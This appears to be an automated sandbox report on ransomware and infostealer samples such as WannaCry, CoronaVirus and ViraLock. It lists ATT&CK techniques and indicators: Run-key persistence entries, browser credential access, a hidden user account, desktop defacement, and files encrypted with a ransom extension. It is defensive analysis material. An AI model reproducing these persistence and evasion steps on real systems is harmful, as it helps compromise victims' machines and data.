Loads dropped DLL 11 IoCs

pid	Process
18128	msedge.exe
11400	msedge.exe
10396	msedge.exe
10776	msedge.exe
11048	msedge.exe
10212	msedge.exe
31072	msedge.exe
30396	msedge.exe
23080	msedge.exe
16088	msedge.exe
22352	msedge.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe"	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\bIMsAwUc.exe = "C:\\Users\\Admin\\mskEQsAA\\bIMsAwUc.exe"	ViraLock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\xCoIMcgw.exe = "C:\\ProgramData\\vSEsoQgo\\xCoIMcgw.exe"	ViraLock.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\bIMsAwUc.exe = "C:\\Users\\Admin\\mskEQsAA\\bIMsAwUc.exe"	bIMsAwUc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\xCoIMcgw.exe = "C:\\ProgramData\\vSEsoQgo\\xCoIMcgw.exe"	xCoIMcgw.exe

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2410826464-2353372766-2364966905-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2410826464-2353372766-2364966905-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	CoronaVirus.exe

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe
File opened (read-only)	\??\A:	nc123.exe
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
447	raw.githubusercontent.com
451	raw.githubusercontent.com
562	raw.githubusercontent.com
573	raw.githubusercontent.com

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\CoronaVirus.exe	CoronaVirus.exe
File created	C:\Windows\System32\Info.hta	CoronaVirus.exe

Hide Artifacts: Hidden Users 1 TTPs 2 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Todos_0.33.33351.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StoreLogo.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_PrepidBypass-ppd.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\System.Windows.Input.Manipulations.resources.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxAccountsLargeTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Threading.Overlapped.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\PresentationCore.resources.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\TXP_DiningReservation_Light.png	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\lv\msipc.dll.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\wordEtw.man.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Serialization.Xml.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-125_contrast-black.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\manifest.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-96_altform-unplated_contrast-white.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_BypassTrial180-ul-oob.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\ui-strings.js	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_hi.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\PresentationFramework.resources.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WideTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailWideTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-default_32.svg	CoronaVirus.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Transactions.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Security.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-ul-oob.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Mozilla Firefox\xul.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\WeatherWideTile.scale-100_contrast-black.png	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\WindowsBase.resources.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RADIAL\RADIAL.ELM.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\System.Windows.Input.Manipulations.resources.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2012.21.0_x64__8wekyb3d8bbwe\Assets\Graphing.targetsize-32_contrast-black.png	CoronaVirus.exe
File created	C:\Program Files\Java\jre-1.8\bin\ssv.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-pl.xrm-ms	CoronaVirus.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\System.Windows.Forms.Primitives.resources.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-amd\types\ISemanticColors.js	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-ppd.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.DynamicData.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\misc\libexport_plugin.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\plugin.js.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-48_altform-unplated.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2102.13.0_x64__8wekyb3d8bbwe\Assets\contrast-black\NotepadAppList.targetsize-72_altform-unplated.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest2-pl.xrm-ms	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\cookie_exporter.exe.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptySearch.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\fontmanager.dll.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-ms.id-F737E21E.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\goopdateres_es-419.dll	CoronaVirus.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
31352	sc.exe
12744	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\CoronaVirus.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Dharma.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\ViraLock.exe:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViraLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
